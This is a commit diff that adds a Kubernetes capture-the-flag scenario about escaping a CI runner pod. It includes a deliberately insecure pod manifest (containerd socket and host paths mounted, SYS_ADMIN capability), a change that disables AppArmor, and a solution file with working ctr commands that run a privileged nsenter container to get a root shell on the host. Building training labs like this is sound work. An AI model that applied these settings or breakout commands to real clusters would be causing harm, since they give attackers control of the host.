feat(scenarios): add ci runner ng breakout

ansible/playbooks/ci-runner-ng-breakout.yaml

@@ -0,0 +1,9 @@
+---
+
+- name: CI Runner NG Breakout
+  hosts: bastion:nodes
+  become: yes
+  vars:
+    state: present
+  roles:
+    - ci-runner-ng-breakout

ansible/roles/ci-runner-ng-breakout/files/challenge.txt

@@ -0,0 +1,5 @@
+During penetration testing of a client kubernetes cluster, a vulnerability in a pod has been noticed.
+
+The pod is part of the CI/CD build infrastructure and you are concerned that a compromised runner may lead to compromsied VMs.
+
+Verify the vulnerability by breaking out of the CI runner pod.

ansible/roles/ci-runner-ng-breakout/files/manifests/scenario.yaml

@@ -0,0 +1,53 @@
+apiVersion: v1
+kind: Namespace
+metadata:
+  name: ci-runner-ng
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  labels:
+    name: jenk-ng-runner-s82n6
+  name: jenk-ng-runner-s82n6
+  namespace: ci-runner-ng
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      name: jenk-ng-runner-s82n6
+  template:
+    metadata:
+      labels:
+        name: jenk-ng-runner-s82n6
+    spec:
+      containers:
+      - image: docker.io/controlplaneoffsec/cri-tools:latest
+        name: jenk-ng-runner-s82n6
+        imagePullPolicy: Always
+        command:
+          - sleep
+          - inf
+        ports:
+        - containerPort: 80
+        volumeMounts:
+        - name: run-containerd
+          mountPath: /run/containerd/
+        - name: var-lib-containerd
+          mountPath: /var/lib/containerd
+        - name: tmp
+          mountPath: /tmp
+        securityContext:
+          capabilities:
+            add:
+              - SYS_ADMIN
+              - SYS_PTRACE
+      volumes:
+      - name: var-lib-containerd
+        hostPath:
+          path: /var/lib/containerd
+      - name: run-containerd
+        hostPath:
+          path: /run/containerd/
+      - name: tmp
+        hostPath:
+          path: /tmp

ansible/roles/ci-runner-ng-breakout/tasks/main.yaml

@@ -0,0 +1,42 @@
+---
+
+- name: Install calico network
+  ansible.builtin.include_role:
+    name: cluster-network
+    tasks_from: calico
+
+- name: Apply K8s manifests
+  kubernetes.core.k8s:
+    definition: "{{ lookup('ansible.builtin.file', item) | from_yaml_all }}"
+    state: "{{ state }}"
+  loop:
+    - manifests/scenario.yaml
+  become: no
+  when: "'bastion' in inventory_hostname"
+
+- name: Set flag
+  ansible.builtin.copy:
+    dest: /root/flag.txt
+    content: flag_ctf{NextGenAutomationBreakoutAchievedTM}
+  when: "state == 'present' and inventory_hostname in groups['nodes']"
+
+- name: Remove flag
+  ansible.builtin.file:
+    path: /root/flag.txt
+    state: absent
+  when: "state == 'absent' and inventory_hostname in groups['nodes']"
+
+- name: Set starting point
+  ansible.builtin.include_role:
+    name: starting-point
+    tasks_from: pod
+  vars:
+    namespace: ci-runner-ng
+    pod: "$(kubectl get po -n ci-runner-ng -l=name=jenk-ng-runner-s82n6 -oname)"
+
+- name: Copy challenge
+  ansible.builtin.include_role:
+    name: starting-point
+    tasks_from: challenge
+  vars:
+    challenge_content: "{{ lookup('ansible.builtin.file', 'files/challenge.txt') }}"

packer/scripts/containerd

@@ -44,4 +44,5 @@ rm cni-plugins.tgz
 # Configure containerd
 containerd config default | sudo tee /etc/containerd/config.toml
 sudo sed -i 's/SystemdCgroup = false/SystemdCgroup = true/g' /etc/containerd/config.toml
+sudo sed -i -e "s/disable_apparmor.*$/disable_apparmor = true/g" /etc/containerd/config.toml
 sudo systemctl restart containerd

scenarios/ci-runner-ng-breakout/solution.md

@@ -0,0 +1,14 @@
+# Solution
+
+## Ctr CLI
+
+```bash
+ctr i pull r.jpts.uk/nsenter1:latest
+ctr run -d --rm --privileged --with-ns pid:/proc/1/ns/pid r.jpts.uk/nsenter1:latest r00t
+ctr t exec -t --exec-id x r00t bash
+```
+
+## Non-Solutions
+
+* Nerdctl doesn't work as we don't mount in the necessary dirs
+* crictl doesn't work due to CNI incompatibiity with calico - [explanation](https://github.com/containerd/cri/issues/520#issuecomment-355362760)

scenarios/ci-runner-ng-breakout/tasks.yaml

@@ -0,0 +1,15 @@
+category: KubeCon
+difficulty: KubeCon
+name: ci-runner-ng-breakout
+kind: cp.simulator/scenario:1.0.0
+objective: Get postgres password.
+tasks:
+  "1":
+    hints:
+    sortOrder: 1
+    startingPoint:
+      mode: pod
+      podName: jenk-ng-runner-s82n6
+      podNamespace: ci-runner-ng
+    summary: There is a containerd socket mounted into the container,
+      is it possible to traverse the cluster?